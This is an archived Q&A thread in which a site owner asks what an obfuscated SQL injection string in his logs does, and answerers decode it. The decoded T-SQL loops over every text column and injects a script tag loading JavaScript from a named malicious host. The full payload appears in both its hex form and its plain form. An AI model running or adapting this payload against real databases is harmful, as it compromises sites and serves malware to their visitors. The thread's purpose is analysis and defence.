SQL injection attack - What is going on here?

Question

Possible Duplicate:
Attempted SQL injection attack - what are they trying to do?

I have seen this SQL injection attempt on my site many times in the last few months.

';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);

After going through my code, I'm sure I'm protected because I query against an in-memory dataset rather than the database itself. However, even though I'm sure I'm protected, I don't fully understand what's going on with this attack attempt and would like to figure it out so I can avoid writing code in the future that may be vulnerable to it.

Can anyone explain to me what these hackers are attempting to do with this code?

Thanks.

-This code is getting appended to the query string as well as getting sent as post data.

If you've already been infected, check out this SO thread for help on resolving the issue: http://stackoverflow.com/questions/32412/whats-the-best-way-of-cleaning-up-after-a-sql-injection#32422 — Dillie-O, Dec 15 '08 at 23:07
Seems like you're more prepared than some other sites: http://blogs.zdnet.com/security/?p=2039 — Jimmy, Dec 15 '08 at 23:21
Ya, I'm use to seeing hack attempts with the standard SQL injection attempts trying to get links on the site and what-not. When I saw this one, I thought - wow, that's pretty clever, I had better check my source to find any possible attack vectors. — Ryan Smith, Dec 16 '08 at 02:00

Jimmy · Accepted Answer · 2008-12-15T23:15:12.883

20

Note: my first explanation was incorrect because I didn't actually read through the whole thing...

here's what that translates to. It searches your database for text or varchar columns (b.xtype in 99,35,231,167) and then injects a javascript file into all text columns in your database. A bit more malicious than I first thought.

DECLARE 
    @T varchar(255),
    @C varchar(4000) 

DECLARE Table_Cursor CURSOR FOR 
    select a.name,b.name 
    from sysobjects a,syscolumns b 
    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) 
OPEN Table_Cursor 
FETCH NEXT 
FROM  Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN exec('update ['+@T+'] set ['+@C+']=''">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script>
      <!--''+['+@C+'] where '+@C+' not like ''%">
    </title>
    <script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
'')
FETCH NEXT FROM  Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

edited Dec 15 '08 at 23:15

answered Dec 15 '08 at 22:57

Jimmy

89,068
17
119
137

@Jimmy: how did you decipher this? – Dan Vinton Dec 15 '08 at 22:58
6

I ran it on my sql server :P – Jimmy Dec 15 '08 at 22:59
1

if you wanted to do it manually, every 2 hex digits defines a number 0-255, which you look up in an ASCII table. – Jimmy Dec 15 '08 at 23:02
Thanks, I'm glad I understand what's going on there now. It looks like one of those attacks that can be thwarted by the standard methods of avoiding SQL injection, but I'm glad I understand it further now. – Ryan Smith Dec 15 '08 at 23:05
it's designed to defeat blacklists. another example of why blacklisting keywords is a bad idea – Jimmy Dec 15 '08 at 23:05
1

"I ran it on my sql server" - Ha! +1 for bravery! It's a good way of obfuscating SQL anyway... – Dan Vinton Dec 15 '08 at 23:35
3

I didn't run the last "EXEC(@S);", of course ;) – Jimmy Dec 15 '08 at 23:39
unobfuscate with this online tool: http://www.percederberg.net/tools/text_converter.html – fro_oo Nov 01 '12 at 11:20

score 7 · Answer 2 · edited Sep 23 '11 at 19:25

7

Actually Jimmy, if you analyze this code, it uses a cursor to inject a javascript reference to hxxp://www2.s800qn.cn/csrss/w.js in every text field in the database.

This means that they don't care about your database, what they want is to use your page to steal data from the users browsing it.

That javascript link is now dead, but it probably contained code to grab the users cookies.

edited Sep 23 '11 at 19:25

CanSpice

34,814
10
72
86

answered Dec 15 '08 at 23:13

FlySwat

172,459
74
246
311

yeah, I noticed that after I posted my original answer, so I rewrote. Thanks for the catch – Jimmy Dec 15 '08 at 23:15
Cripes... does StackOverflow automatically make any "http://blahblah.com" strings into active links? I know you didn't do that on purpose! :) – Bryan Feb 17 '09 at 03:45

score 3 · Answer 3 · answered Dec 15 '08 at 23:01

3

Further to Jimmy's post: you can also use a hex-ascii translator to get this:

DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR  FOR select 
a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and 
(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT 
FROM  Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN 
exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://www2.s800qn.cn
/csrs/w.js"></script>''+['+@C+'] where '+@C+' not like ''%"></title><script 
src="http://www2.s800qn.cn/csrss/w.js"></script>''')FETCH NEXT FROM  Table_Cursor INTO 
@T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

answered Dec 15 '08 at 23:01

Michael Sharek

5,043
2
30
33

I ran into this a while back and created a small Winforms app that will do the translation for you as well, thanks to some help from some SO folks here: http://www.codeplex.com/urldecoder – Dillie-O Dec 15 '08 at 23:05
http://www.string-functions.com/hex-string.aspx – jason saldo Dec 15 '08 at 23:05
Wow, I went to all that crazy work and yet there was already a web site that slipped through my googling fingers... Well, at least I learned some new stuff through the process. 8^D – Dillie-O Dec 15 '08 at 23:22

score 2 · Answer 4 · answered Dec 15 '08 at 23:17

2

Just to help if you haven't figured out already this is an automated attack not targeted. And the purpose of the included .js file is distributing malware by using your website and it includes several exploits mostly targets IE users.

answered Dec 15 '08 at 23:17

dr. evil

26,944
33
131
201

SQL injection attack - What is going on here?

4 Answers4